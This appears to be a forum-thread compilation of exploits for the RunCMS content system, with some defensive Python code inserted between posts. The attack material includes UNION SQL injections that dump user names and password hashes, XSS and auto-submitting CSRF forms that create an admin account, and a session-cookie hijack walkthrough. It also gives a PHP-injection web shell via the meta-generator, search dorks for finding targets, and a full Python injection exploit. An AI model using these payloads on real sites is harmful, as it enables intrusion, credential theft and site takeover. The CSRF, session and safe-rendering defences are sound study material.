RunCMS vulnerability overview

Vendor site: www.runcms.org
Current version: 1.6.1

Exploits

Target: RunCMS <= 1.2
Impact: arbitrary command execution
RunCMS <= 1.2 (class.forumposts.php) Arbitrary Remote Inclusion Exploit

Target: RunCms 1.5.2 and earlier versions
Impact: SQL injection
RunCms <= 1.5.2 (debug_show.php) Remote SQL Injection Exploit

Target: RunCMS <= 1.6
Impact: arbitrary command execution
RunCMS <= 1.6 Local File Inclusion Vulnerability

Target: RunCMS 1.6 and earlier versions
Impact: arbitrary command execution
RunCMS <= 1.6 disclaimer.php Remote File Overwrite Exploit

Target: RunCMS 1.6
Impact: SQL injection
RunCMS 1.6 Get Admin Cookie Remote Blind SQL Injection Exploit

Target: RunCMS 1.6
Impact: SQL injection
RunCMS 1.6 Remote Blind SQL Injection Exploit (IDS evasion)

Target: RunCMS Newbb_plus 0.92 and earlier versions
Impact: SQL injection
RunCMS Newbb_plus <= 0.92 Client IP Remote SQL Injection Exploit

1. Multiple Blind SQL Injection

Attacker can inject SQL code in modules:

Code:
http://[server]/[installdir]/modules/mydownloads/brokenfile.php?lid+DSecRG_INJECTION
http://[server]/[installdir]/modules/mydownloads/visit.php?lid=2+DSecRG_INJECTION
http://[server]/[installdir]/modules/mydownloads/ratefile.php?lid=2+DSecRG_INJECTION
http://[server]/[installdir]/modules/mylinks/ratelink.php?lid=2+DSecRG_INJECTION
http://[server]/[installdir]/modules/mylinks/modlink.php?lid=2+DSecRG_INJECTION
http://[server]/[installdir]/modules/mylinks/brokenlink.php?lid=2+DSecRG_INJECTION

Example:

This query will return a link to download the file:

Code:
GET http://[server]/[installdir]/modules/mydownloads/brokenfile.php?lid=1+and+1=1 HTTP/1.0

This query will return an error:

Code:
GET http://[server]/[installdir]/modules/mydownloads/brokenfile.php?lid=1+and+1=0 HTTP/1.0

2. Stored XSS

Vulnerability found in script modules/news/submit.php in POST parameter "subject".

Example:

Code:
POST http://[server]/[installdir]/modules/news/submit.php HTTP/1.0

subject=<script>alert("DSecRG_XSS")</script>

3. Linked XSS

Vulnerability found in modules/news/index.php; attacker can inject XSS in the URL string:

Example:

Code:
http://[server]/[installdir]/modules/news/index.php/"><script>alert('DSecRG_XSS')</script>

4. PHP injection

These pages can be overwritten by PHP injection:

Code:
runcms_1.6\modules\sections\cache\intro.php
runcms_1.6\modules\mylinks\cache\disclaimer.php
runcms_1.6\modules\mydownloads\cache\disclaimer.php
runcms_1.6\modules\newbb_plus\cache\disclaimer.php
runcms_1.6\modules\system\cache\disclaimer.php
runcms_1.6\modules\system\cache\footer.php
runcms_1.6\modules\system\cache\header.php
runcms_1.6\modules\system\cache\maintenance.php

V. 1.3a5 XSS

Code:
http://site.com/public/modules/downloads/ratefile.php?lid={number}">[XSS code]

RUNCMS 1.5.1 SQL Injection

Code:
http://site.ru/modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2

//milw0rm.com
I found a blind SQL injection in runcms and started checking whether it was old news; it turned out the injection had been found before me, but it is not on Antichat, so I'm posting it. The vulnerability is in the "bid" parameter of the "modules/banners/click.php" script.

Example:
http://www.runcms.de/modules/banners/click.php?op=click&bid=3%20and%20substring(version(),1,1)=4
1) RunCMS MyAnnonces SQL Injection (cid)

Code:
# AUTHOR : S@BUN
#
# HOME 1 : http://www.milw0rm.com/author/1334
#
# MAIL : [email protected]
#
################################################################
#
# DORK 1 : allinurl: "modules MyAnnonces index php pa view"
#
################################################################

EXAMPLE

XXXXMyAnnonces/index.php?pa=view&cid=[EXPLOiT]

EXPLOIT :

for admin =
-9999999/**/union/**/select/**/0,uname/**/from/**/runcms_users/*

for pass =
-9999999/**/union/**/select/**/0,pass/**/from/**/runcms_users/*

2) RunCMS 1.6.1 Multiple XSS and XSRF

HTML:
###################################################################
RunCMS 1.6.1 Multiple XSS and XSRF Vulnerabilities by NBBN
###################################################################

1) Create Webmaster (admin) XSRF Vulnerability

<html><head></head><body onLoad="javascript:document.attack.submit()">
<form action="http://localhost/xampp/runcms/modules/system/admin.php" method="post" enctype="multipart/form-data" name="r">
<input type="hidden" name="uname" value="Attacker">
<input type="hidden" name="name" value="Attacker">
<input type="hidden" name="email" value="[email protected]">
<input type="hidden" name="url" value="">
<input type="hidden" name="user_avatar" value="blank.gif">
<input type="hidden" name="theme" value="helloween">
<input type="hidden" name="timezone_offset" value="0">
<input type="hidden" name="language" value="deutsch">
<input type="hidden" name="user_icq" value="">
<input type="hidden" name="user_aim" value="">
<input type="hidden" name="user_msnm" value="">
<input type="hidden" name="user_from" value="">
<input type="hidden" name="user_occ" value="">
<input type="hidden" name="user_intrest" value="">
<input type="hidden" name="user_birth%5b2%5D" value="">
<input type="hidden" name="user_birth%5B1%5D" value="">
<input type="hidden" name="user_birth%5BO%5D" value="">
<input type="hidden" name="user_sig" value="">
<input type="hidden" name="umode" value="flat">
<input type="hidden" name="uorder" value="1">
<input type="hidden" name="bio" value="">
<input type="hidden" name="rank" value="7">
<input type="hidden" name="pass" value="Password">
<input type="hidden" name="pass2" value="Password">
<input type="hidden" name="fct" value="users">
<input type="hidden" name="op" value="addUser">
<input type="hidden" name="submit" value="%DCbernehmen">
</form>
</body></html>

Also with XSRF an attacker can update the profile of all users. He can change the password etc...

2) Cross-Site Scripting (an attacker can only attack an admin)

<html><head></head><body onLoad="javascript:document.r.submit()">
<form action="http://localhost/xampp/runcms/modules/system/admin.php" method="post" enctype="multipart/form-data" name="r">
<input type="text" class="text" name="rank_title" size="30" maxlength="50" value="<marquee>Cross-Site Scritping :-("/>
<input type="hidden" name="fct" value="userrank">
<input type="hidden" name="op" value="RankForumAdd">
</form>
</body></html>
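The auto-submitting form above works because admin.php accepts any POST that arrives with the admin's session cookie. The check that stops it is a per-session anti-forgery token plus an Origin/Referer check in front of the state-changing handler. The following is an added example (not RunCMS code, not part of NBBN's advisory) modelling that check in Python; the handler, the constructed secret, the form field `csrf_token` and the site origin `http://localhost` are assumptions for the demonstration.

```python
import hashlib
import hmac
import os

# Constructed per-deployment server secret; a real install would load it from config.
SERVER_SECRET = os.urandom(32)

def issue_csrf_token(session_id: str) -> str:
    """Token bound to the caller's session; the real admin form embeds it as a hidden field.
    A page on another origin cannot read the admin's session id, so it cannot compute this."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()

def verify_csrf_token(session_id: str, submitted: str) -> bool:
    # Constant-time comparison so the token cannot be guessed byte by byte.
    return hmac.compare_digest(issue_csrf_token(session_id), submitted or "")

def same_origin(headers: dict, site_origin: str) -> bool:
    """Second layer: a form auto-submitted from another site carries that site as Origin/Referer."""
    origin = headers.get("Origin")
    if origin is not None:
        return origin == site_origin
    referer = headers.get("Referer", "")
    return referer.startswith(site_origin + "/")

def handle_add_user(session_id: str, headers: dict, form: dict) -> str:
    """Model of the admin.php fct=users&op=addUser handler with both checks before the write."""
    if form.get("fct") != "users" or form.get("op") != "addUser":
        return "ignored"
    if not same_origin(headers, "http://localhost"):
        return "rejected: cross-site request"
    if not verify_csrf_token(session_id, form.get("csrf_token", "")):
        return "rejected: missing or invalid CSRF token"
    return "created user %s with rank %s" % (form.get("uname"), form.get("rank"))

# Constructed request modelled on the hidden-input form quoted in the post above
ATTACK_FORM = {"fct": "users", "op": "addUser", "uname": "Attacker", "rank": "7",
               "pass": "Password", "pass2": "Password"}
ATTACK_HEADERS = {"Referer": "http://evil.example/lure.html"}  # attacker's page; no token

if __name__ == "__main__":
    print(handle_add_user("admin-sess", ATTACK_HEADERS, ATTACK_FORM))
    token = issue_csrf_token("admin-sess")
    print(handle_add_user("admin-sess", {"Origin": "http://localhost"},
                          dict(ATTACK_FORM, csrf_token=token)))
```

Either check alone would have rejected the quoted form: it carries no token, and the browser sends the lure page as Origin/Referer. Binding the token to the session rather than storing it server-side keeps the check stateless.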
RUNCMS 1.6.1

Adding a comment
-----------------------------
Incorrect BB Code handling => active XSS

Example:

Code:
[*color]</textarea>[XSS][/*color]

Component Partner Sites 1.03 SQL Injection (Admin priv)

Exploit:

Code:
modules/partners/admin/index.php?op=edit_partner&id=-1/**/union/**/select/**/1,2,3,4,5,concat(uname,0x3a,pass),7/**/from+runcms_users/**/limit/**/0,1

Component Web Links 1.02 SQL Injection (Admin priv)

Exploit:

Code:
modules/mylinks/admin/index.php?op=modCat&cid=-1/**/union/**/select/**/1,concat(uname,0x3a,pass),3,4/**/from+runcms_users+limit+0,1

Hashing algorithm

PHP:
$pass = sha1($username.$pass);

© ZAMUT
RunCMS Module section (artid) Remote SQL Injection Vulnerability

Code:
Cr@zy_King [email protected] / hackshow.us
Grtz : Crackers_Child - str0ke - 3php - Alemin_Krali - Eno7 - DreamTurk - The_Bekir - Mhzr91

Runcms Module Section (artid) Remote Sql Inj. Vuln.

Example :
- modules/sections/index.php?op=viewarticle&artid=Sql
- Sql : 1+and+1=0+union+select+1,2,pass,4,5,pwdsalt,7,8,9,10+from+runcms_users+where+uid=2

Cr@ Says : Memati won't die in Valley of the Wolves, nobody get excited :D
Alemin_Krali Says : I fully agree (whatever the relevance)

Good.

# milw0rm.com [2008-03-20]
RunCMS Module Photo 3.02 (cid) Remote SQL Injection Vulnerability

SQL Injection
Vulnerable: Module Photo 3.02

Exploit:

Code:
admin
modules/photo/viewcat.php?id=150&cid=-99999/**/union/**/select/**/0,uname/**/from/**/runcms_users/*

pass
modules/photo/viewcat.php?id=150&cid=-99999/**/union/**/select/**/0,pass/**/from/**/runcms_users/*

Dork:

Code:
allinurl: "modules/photo/viewcat.php?id"
inurl:photo "powered by runcms"

© S@BUN
RunCMS Module nGuestBook 1.01 Active XSS

Add message => Message => [XSS]

dork: inurl:/modules/nguestbook/

SQL Injection
Vulnerable: Module Photo 4.00

Vuln code:

PHP:
.....
include_once(PHOTO_PATH."/class/bama_cat.php");
$id = $HTTP_GET_VARS['id'];
if (isset($HTTP_GET_VARS['cid'])) {
.....

Exploit:

Code:
http://site.com/modules/photo/rateimg.php?id=-999999+union+select+pass+from+runcms_users+where+uid=1

ZAMUT (c)
RunCMS Module MyArticles 0.0.4-0.5 sql-inj

SQL injection in the topic_id parameter; GET is filtered, so the data has to be sent via POST.

Code:
http://mobilefree.ru/modules/myarticles/topics.php?op=listarticles&topic_id=-2 union select 1,2,concat_ws(0x3a,uname,pass),4,5,6 from runcms_users

© H00k
RunCMS Module MyArticles 0.6 Beta-1 SQL Injection Vulnerability

SQL Injection

http://localhost/modules/myarticles/topics.php?op=listarticles&topic_id=[SQL]

Code:
-2 union select 1,2,concat_ws(0x3a,uname,pass),4,5,6 from runcms_users

milw0rm.com
RunCMS Module HotNews 2.00 (tid) Remote SQL Injection Vulnerability

Vuln code:

PHP:
.....
include(XOOPS_ROOT_PATH."/header.php");
$tid = $HTTP_GET_VARS['tid'];
if ($HTTP_GET_VARS['page']) {
    $page = $HTTP_GET_VARS['page'];
.....

Exploit:

Code:
/modules/HotNews/index.php?op=printpage&tid=-9997+union+select+1,2,pass,4+from+runcms_users

Example:

Code:
http://www.segacfecgc.info/modules/HotNews/index.php?op=printpage&tid=-9997+union+select+1,2,pass,4+from+runcms_users

dork: /modules/HotNews/

ZAMUT(c)
A method for when the SQL injection worked but there's no way to brute-force the hash!

1. Register an account on the site (the victim).

2. In my case the injection I performed looked like this:

Code:
modules/sections/index.php?op=viewarticle&artid=1+and+1=0+union+select+1,2,hash,4,5,uname,7,8,9,10+from+runcms_session+where+uid=3

This way we dump the admin's session hash (don't forget the id)! It printed something like this:
eb5cafcd8afa7edf125edfa35c55c73e425bd1d0

3. Log in under the registered account and look at our cookies. They look roughly like this:

Code:
a%3A3%3A%7Bi%3A0%3Bs%3A5%3A%2220001%22%3Bi%3A1%3Bs%3A40%3A%22e2ef357450c7c647fa5c813808d1500273407483%22%3Bi%3A2%3Bi%3A1212184753%

our id = 20001 and session = e2ef357450c7c647fa5c813808d1500273407483

4. Change to the admin's id (in my case id = 00003) and session = eb5cafcd8afa7edf125edfa35c55c73e425bd1d0. We get the following:

Code:
a%3A3%3A%7Bi%3A0%3Bs%3A5%3A%2200003%22%3Bi%3A1%3Bs%3A40%3A%22e2ef357450c7c647fa5c813808d1500273407483%22%3Bi%3A2%3Bi%3A1212184753%3B%7D

I changed the cookies through a plugin in Firefox: ticked the box next to Session cookies and refreshed the page. And we're in the admin panel.

Thanks for your attention!
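The rc_sess cookie above is a URL-encoded PHP-serialized array `[uid, session hash, timestamp]`, and the walkthrough relies on two server-side weaknesses: the session hash sits in a readable table, and the uid field of the cookie is taken at face value. The following is an added example (not RunCMS code, not from the post) in Python that parses that cookie format and validates it the way a hardened session layer would: the session table keeps only SHA-256 of the token, and the cookie's uid must equal the owner recorded for that token. The session store, the expiry values and the completed first cookie (the post truncates it after `1212184753%`) are constructed here.

```python
import hashlib
import re
from urllib.parse import unquote

def parse_php_array(serialized: str) -> list:
    """Parse the flat PHP-serialized array RunCMS keeps in rc_sess, e.g.
    a:3:{i:0;s:5:"20001";i:1;s:40:"e2ef...";i:2;i:1212184753;} -> ["20001", "e2ef...", 1212184753].
    Only integer keys with int/string values are accepted; anything else raises ValueError."""
    m = re.fullmatch(r"a:(\d+):\{(.*)\}", serialized, re.S)
    if not m:
        raise ValueError("not a serialized PHP array")
    count, body = int(m.group(1)), m.group(2)
    items, pos = [], 0
    for _ in range(count):
        key = re.match(r"i:\d+;", body[pos:])
        if not key:
            raise ValueError("expected integer key")
        pos += key.end()
        if body.startswith("i:", pos):
            val = re.match(r"i:(-?\d+);", body[pos:])
            if not val:
                raise ValueError("bad integer value")
            items.append(int(val.group(1)))
            pos += val.end()
        elif body.startswith("s:", pos):
            val = re.match(r's:(\d+):"', body[pos:])
            if not val:
                raise ValueError("bad string header")
            length, start = int(val.group(1)), pos + val.end()
            if body[start + length:start + length + 2] != '";':
                raise ValueError("declared string length does not match")
            items.append(body[start:start + length])
            pos = start + length + 2
        else:
            raise ValueError("unsupported value type")
    if pos != len(body):
        raise ValueError("trailing data")
    return items

def _token_key(token: str) -> str:
    # Server keeps only SHA-256(token): a dump of the session table yields nothing usable as a cookie.
    return hashlib.sha256(token.encode()).hexdigest()

# Constructed server-side session store: sha256(token) -> (owner uid, expiry epoch seconds)
SESSIONS = {
    _token_key("e2ef357450c7c647fa5c813808d1500273407483"): (20001, 1212200000),
    _token_key("eb5cafcd8afa7edf125edfa35c55c73e425bd1d0"): (3, 1212200000),
}

def validate_rc_sess(cookie_value: str, now: int):
    """Return the uid the cookie proves, or None. The uid field is never trusted on its own:
    it has to match the owner recorded for the session token."""
    try:
        uid_str, token, _issued = parse_php_array(unquote(cookie_value))
    except ValueError:
        return None
    if not (isinstance(uid_str, str) and uid_str.isdigit()
            and isinstance(token, str) and re.fullmatch(r"[0-9a-f]{40}", token)):
        return None
    record = SESSIONS.get(_token_key(token))
    if record is None:
        return None
    owner_uid, expires = record
    if int(uid_str) != owner_uid or now > expires:
        return None
    return owner_uid

# Constructed from the two cookies quoted in the post (first one completed with the %3B%7D tail)
ORIGINAL_COOKIE = ("a%3A3%3A%7Bi%3A0%3Bs%3A5%3A%2220001%22%3Bi%3A1%3Bs%3A40%3A%22"
                   "e2ef357450c7c647fa5c813808d1500273407483%22%3Bi%3A2%3Bi%3A1212184753%3B%7D")
EDITED_COOKIE = ("a%3A3%3A%7Bi%3A0%3Bs%3A5%3A%2200003%22%3Bi%3A1%3Bs%3A40%3A%22"
                 "e2ef357450c7c647fa5c813808d1500273407483%22%3Bi%3A2%3Bi%3A1212184753%3B%7D")

if __name__ == "__main__":
    print(validate_rc_sess(ORIGINAL_COOKIE, 1212184800))  # 20001
    print(validate_rc_sess(EDITED_COOKIE, 1212184800))    # None: uid does not own that token
```

Swapping only the uid, as in step 4, now fails because the token's owner is 20001. A token that is itself leaked remains a valid credential for its owner, which is why storing the table as digests (so the injection in step 2 returns nothing replayable) and fixing the injection matter more than any cookie-side check.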
RunCMS Module Reviews 2.00 (lid) Remote SQL Injection Vulnerability

Vuln code:

PHP:
.....
global $xoopsConfig, $db, $HTTP_POST_VARS, $myts, $eh;
$lid = $HTTP_POST_VARS['lid'];
$title = $HTTP_POST_VARS['title'];
.....

Exploit:

Code:
/modules/myReviews/reviewbook.php?lid=-999991+union+select+pass+from+runcms_users

ZAMUT (c)
RunCMS Module Arcade 1.28 (gid) Remote SQL Injection Vulnerability

Vuln code:

PHP:
global $HTTP_POST_VARS, $HTTP_GET_VARS, $myts;
$commit = isset($HTTP_POST_VARS['commit']) ? $HTTP_POST_VARS['commit'] : $HTTP_GET_VARS['commit'];
$gid = isset($HTTP_POST_VARS['gid']) ? $HTTP_POST_VARS['gid'] : $HTTP_GET_VARS['gid'];

Exploit:

Code:
/index.php?act=play_game&gid=-999999+union+select+1,2,3,4,pass,6,7,8,9,10,11,12,13,14+from+runcms_users

ZAMUT(c)
RunCMS <= 1.6.1 (msg_image) SQL Injection Exploit

Code:
#!/usr/bin/python
"""
#=================================================================================================#
# (ASCII art logo)
#=================================================================================================#
# This is a public Exploit
#=================================================================================================#
# Runcms <= 1.6.1
# Sql Injection Vulnerability
# Benchmark Method
#=================================================================================================#
# .-= In memory of our friend rGod =-.
#=================================================================================================#
# Server Configuration Requirements              # Some Information
#   magic_quotes_gpc = 0                         # Vendor: runcms.org
#                                                # Author: The:Paradox
#                                                # Severity: Moderately Critical
# Uff... I have to find something to put here... # Proud To Be Italian.
#=================================================================================================#
# Proof Of Concept / Bug Explanation
#
# This time i'm really too lazy to write a long PoC.
# $msg_image (but also $msg_attachment) is unproperly checked when calling store()
# function (modules/messages/class/pm.class.php)
# Sql injection in insert syntax (whatever I am not using blind attack). Prefix knowledge needed.
#=================================================================================================#

[modules/messages/class/pm.class.php]

function store() {
    global $db, $upload;

    if ( !$this->isCleaned() ) {
        if ( !$this->cleanVars() ) {
            return false;
        }
    }

    foreach ( $this->cleanVars as $k=>$v ) {
        $$k = $v;
    }

    if ( empty($msg_id) ) {

        $msg_id = $db->genId($db->prefix('private_msgs').'_msg_id_seq');

        $sql = "
            INSERT INTO ".$db->prefix("private_msgs")." SET
            msg_id=".intval($msg_id).",
            msg_image='$msg_image',
            msg_attachment='$msg_attachment',
            subject='$subject',
            from_userid=".intval($from_userid).",
            to_userid=".intval($to_userid).",
            msg_time=".time().",
            msg_text='$msg_text',
            read_msg=0,
            type='".$type."',
            allow_html=".intval($allow_html).",
            allow_smileys=".intval($allow_smileys).",
            allow_bbcode=".intval($allow_bbcode).",
            msg_replay=".intval($msg_replay)."";
    }

    if ( !$result = $db->query($sql) ) {
        $this->errors[] = _NOTUPDATED;
        return false;
    }

    return true;
}

#=================================================================================================#
# There are other vulnerabilities in this CMS. Find them by yourself.
#=================================================================================================#
# Use this at your own risk. You are responsible for your own deeds.
#=================================================================================================#
# Python Exploit Starts
#=================================================================================================#
"""

import urllib, urllib2
from sys import argv, exit

main = """
#================================================================#
# Runcms <= 1.6.1                                                #
# Sql Injection Vulnerability                                    #
# Discovered By The:Paradox                                      #
#                                                                #
# rGod is still alive in our hearts                              #
#                                                                #
# Usage:                                                         #
# ./homerun [Target+path] [TargetUid] [ValidUserCookie]          #
# ./homerun --help (to print an example)                         #
#================================================================#
"""

prefix = "runcms_"

if len(argv)>=2 and argv[1] == "--help":
    print "\nuser@linux:~/Desktop$ ./homerun http://localhost/web/runcms/ 1 rc_sess=a%3A3%3A%7Bi%3A0%3Bi%3A3%3Bi%3A1%3Bs%3A40%3A%228b394462d67198707aea362098001610d35687ff%22%3Bi%3A2%3Bi%3A1212933002%3B%7D;\n\n" + main + "\n\n[.] Exploit Starting.\n[+] Sending HTTP Request...\n[+] A message with username and password of user with id 1 has been sent to user with id 3.\n -= The:Paradox =-"
else:
    print main

if len(argv)<=3:
    exit()
else:
    print "[.] Exploit Starting."

host = argv[1]
tuid = argv[2]
cookie = argv[3]

try:
    uid = cookie.split("a%3A3%3A%7Bi%3A0%3Bi%3A")[1].split("%3Bi%3A1%3Bs%3A40%3A%")[0]
except:
    exit("[-] Invalid cookie")

sql = "icon12.gif', msg_attachment='', subject='Master, all was done.', from_userid=" + str(uid) + ", to_userid=" + str(uid) + ", msg_time=0, msg_text=concat('Master, password hash for ',(select uname from " + prefix + "users where uid=" + tuid + "),' is ',(select pass from " + prefix + "users where uid=" + tuid + ")), read_msg=0, type='1', allow_html=0, allow_smileys=1, allow_bbcode=1, msg_replay=0/*"

print "[+] Sending HTTP Request..."

values = {'subject' : 'Master attack failed.',
          'message' : 'Probably mq = 1 or system patched.',
          'allow_html' : 0,
          'allow_smileys' : 1,
          'allow_bbcode' : 0,
          'msg_replay' : 1,
          'submit' : '1',
          'msg_image' : sql,
          'to_userid' : uid }

headers = {'Cookie' : cookie,
           'Content-Type' : 'application/x-www-form-urlencoded'}

req = urllib2.Request(host + "/modules/messages/pmlite.php", urllib.urlencode(values), headers)
response = urllib2.urlopen(req)

if response.read().find('Your message has been posted.') != -1:
    print "[+] A message with username and password of user with id " + tuid + " has been sent to user with id " + uid + ".\n -= The:Paradox =-"
else:
    print "[-] Unable to send message"

# milw0rm.com [2008-05-08]
In the admin panel

File reader (all versions). DB config:

Code:
http://localhost/runcms/class/debug/highlight.php?file=../../mainfile.php

You can trojan every page of the CMS: here we edit the header or the footer as needed; I inserted an iframe.

Code:
http://localhost/runcms/modules/system/admin.php?fct=meta-generator

And no idea what these are good for, but let them be. SQL-inj.

Code:
/modules/system/admin.php?fct=smilies&op=SmilesEdit&id=-1+union+select+1,pass,3,4+from+runcms_users
/modules/system/admin.php?fct=userrank&op=RankForumEdit&rank_id=-1+union+select+1,pass,3,4,5,6+from+runcms_users

ZAMUT (c)
Uploading a shell in RunCMS

Uploading a shell in RunCMS via Meta-Generator

Vulnerable piece of code:

Code:
.......
$content .= "\$meta['follow'] = \"".$_POST["Xfollow"]."\";\n";
$content .= "\$meta['pragma'] = \"".$_POST["Xpragma"]."\";\n";
$content .= "\$meta['icon'] = \"".$_POST["Xicon"]."\";\n";
.......
write_file("meta", $content, "w");

Go to:

Code:
http://localhost/runc/modules/system/admin.php?fct=meta-generator

The Bookmark Icon field looks like this:

Code:
../../favicon.ico

Edit it like so:

Code:
../../favicon.ico";echo `$_REQUEST[c]`;#

Now the file with this option (\modules\system\cache\meta.php) looks like this:

Code:
.........
$meta['rating'] = "general";
$meta['p3p'] = "";
$meta['index'] = "index";
$meta['follow'] = "follow";
$meta['pragma'] = "";
$meta['icon'] = "../../favicon.ico";echo `$_REQUEST[c]`;#";
.........

I.e. a classic PHP injection; as you can see, everything now depends on our imagination. Use it like this:

Code:
http://localhost/runc/modules/system/admin.php?fct=meta-generator&c=dir

IMHO the method is completely stealthy (when we use POST).

Also, as an option, you can include a smiley/avatar with PHP code added to it (after upload it will be at ../../images/smilies/smile.gif).

ZAMUT (c)
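The defect is that the generator builds PHP source by string concatenation, so a double quote in the submitted value ends the literal and the rest of the input becomes code. The following is an added example (not RunCMS code, not from the post) in Python: it reproduces the unsafe rendering to show the exact line the post quotes, gives the corrected rendering (emit a single-quoted PHP literal with only `\` and `'` escaped, as PHP's var_export() does, so nothing in the value is ever parsed), and an audit that flags any line of a generated meta.php that is not a single plain assignment. The functions and the key allow-list are assumptions for the demonstration; the file layout follows the post's listing.

```python
import re

def render_meta_unsafe(key: str, value: str) -> str:
    """Mirrors the vulnerable concatenation:  $content .= "\\$meta['icon'] = \\"".$_POST["Xicon"]."\\";\\n";
    A double quote in value closes the literal and the remainder is written as PHP code."""
    return "$meta['%s'] = \"%s\";" % (key, value)

def php_single_quoted(value: str) -> str:
    """PHP single-quoted literal (what var_export() emits): only backslash and quote are special,
    and single-quoted strings never interpolate $variables or backtick commands."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"

def render_meta_safe(key: str, value: str) -> str:
    # Assumed allow-list for keys; values are opaque data and are never pasted in raw.
    if not re.fullmatch(r"[a-z0-9_]+", key):
        raise ValueError("invalid meta key")
    return "$meta['%s'] = %s;" % (key, php_single_quoted(value))

# One assignment per line, either quoting style, and nothing after the closing quote and ';'.
# Double-quoted values may not contain '$' or backticks (interpolation / shell execution).
ASSIGNMENT_RE = re.compile(
    r"""^\$meta\['[a-z0-9_]+'\] = (?:'(?:[^'\\]|\\.)*'|"(?:[^"\\$`]|\\.)*");$""")

def audit_meta_file(text: str) -> list:
    """Return the lines of a generated meta.php that are not a single plain assignment.
    Run over modules/system/cache/meta.php (and the other cache files the thread lists)
    to detect an injected value after the fact."""
    suspicious = []
    for line in text.splitlines():
        if line.strip() in ("", "<?php", "?>"):
            continue
        if not ASSIGNMENT_RE.match(line):
            suspicious.append(line)
    return suspicious

# Constructed input: the Bookmark Icon value from the post
PAYLOAD = '../../favicon.ico";echo `$_REQUEST[c]`;#'

if __name__ == "__main__":
    print(render_meta_unsafe("icon", PAYLOAD))   # the injected line the post shows
    print(render_meta_safe("icon", PAYLOAD))     # same value, inert string literal
    print(audit_meta_file("<?php\n" + render_meta_unsafe("icon", PAYLOAD) + "\n?>"))
```

The safe rendering keeps the attacker's text byte for byte, but as data: PHP sees one string assignment and the backtick expression is never evaluated. The audit is the check to run on the existing cache files, since an already-injected file keeps working until the generator is run again.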
RunCms <= 1.5.2 /class/debug/debug_show.php sql injection / credentials disclosure exploit

PHP:
<?php
print_r('
--------------------------------------------------------------------------
RunCms <= 1.5.2 /class/debug/debug_show.php sql injection / credentials disclosure exploit
by rgod
mail: retrog at alice dot it
site: http://retrogod.altervista.org
dork: "Runcms Copyright" "2002 - 2007" +"page created"
---------------------------------------------------------------------------
');

/*
software site: http://www.runcms.org/modules/news/

vulnerable code in /class/debug/debug_show.php:

<?php
...
include_once("../../mainfile.php");
include_once("../../header.php");

switch($_POST['debug_show']) {
    case "show_files":
        show_files($_POST['loaded_files']);
        break;
    case "show_queries":
        show_queries($_POST['executed_queries'], $_POST['sorted']);
        break;
}

include_once("../../footer.php");
?>

no authentication is performed to run show_files() and show_queries() functions,
look at this now in /class/debug/debug.php:

...
function show_queries($executed_queries, $sorted=0) {
    global $db;
    $executed_queries = unserialize(urldecode($executed_queries));
    if ($sorted == 1) {
        sort($executed_queries);
        $is_sorted = _DBG_SORTEDR;
    } else {
        array_reverse($executed_queries);
        $is_sorted = _DBG_NSORTEDR;
    }
    OpenTable();
    $fulldebug = "
    <h4>($is_sorted) "._DBG_QEXECED.": ".count($executed_queries)."</h4>
    <table width='100%' cellpadding='3' cellspacing='1'>";
    $size = count($executed_queries);
    for ($i=0; $i<$size; $i++) {
        $stime = get_micro_time();
        $query = $db->query("EXPLAIN ".$executed_queries[$i]."");
        $querytime = (get_micro_time() - $stime);
        $totaltime += $querytime;
        $fulldebug .= "<tr>
        <td nowrap='nowrap' class='bg2'><b>"._DBG_QUERY.": ".($i+1)."</b></td>
        <td colspan='7' class='bg3'>$executed_queries[$i]</td>
        </tr><tr>
        <td nowrap='nowrap' class='bg2'><b>"._DBG_TIME.":</b></td>
        <td colspan='7' class='bg3'>".round($querytime, 4)." "._DBG_SECONDS."</td>
        </tr><tr>
        <td nowrap='nowrap' class='bg2'><b>"._DBG_TABLE.":</b></td>
        <td nowrap='nowrap' class='bg2'><b>"._DBG_TYPE.":</b></td>
        <td nowrap='nowrap' class='bg2'><b>"._DBG_POSSKEYS.":</b></td>
        <td nowrap='nowrap' class='bg2'><b>"._DBG_KEY.":</b></td>
        <td nowrap='nowrap' class='bg2'><b>"._DBG_KEYLEN.":</b></td>
        <td nowrap='nowrap' class='bg2'><b>ref:</b></td>
        <td nowrap='nowrap' class='bg2'><b>"._DBG_ROWS.":</b></td>
        <td nowrap='nowrap' class='bg2'><b>"._DBG_EXTRA.":</b></td>
        </tr>";
        while ($result = $db->fetch_array($query)) {
            $fulldebug .= "
            <tr>
            <td class='bg3' nowrap='nowrap' {$result['table']} </td>
            <td class='bg3' nowrap='nowrap' {$result['type']} </td>
            <td class='bg3'>{$result['possible_keys']} </td>
            <td class='bg3' nowrap='nowrap' {$result['key']} </td>
            <td class='bg3' nowrap='nowrap' {$result['key_len']} </td>
            <td class='bg3' nowrap='nowrap' {$result['ref']} </td>
            <td class='bg3' nowrap='nowrap' {$result['rows']} </td>
            <td class='bg3'>{$result['Extra']} </td>
            </tr>";
        }
        $fulldebug .= "<tr>
        <td colspan='8' class='bg1'>"._DBG_CUMULATED.":".round($totaltime, 4)." "._DBG_SECONDS."<hr noshade></td>
        </tr>";
    }
    $fulldebug .= "</table>";
    echo $fulldebug;
    CloseTable();
}
...

we have a nice kind of sql injection here!
also show_files function can be used to check the existence of certain files
and retrieve the filesize or if it has been modified and so on...
*/

if ($argc<3) {
print_r('
---------------------------------------------------------------------------
Usage: php '.$argv[0].' host path OPTIONS
host:      target server (ip/hostname)
path:      path to runcms
Options:
  -p[port]:    specify a port other than 80
  -P[ip:port]: "" a proxy
  -T[prefix]   "" a table prefix (default: runcms)
Example:
php '.$argv[0].' localhost /runcms/ -P1.1.1.1:80
php '.$argv[0].' localhost / -Trcms -p81
---------------------------------------------------------------------------
');
die;
}

error_reporting(7);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.=" .";}
   else
   {$result.=" ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}

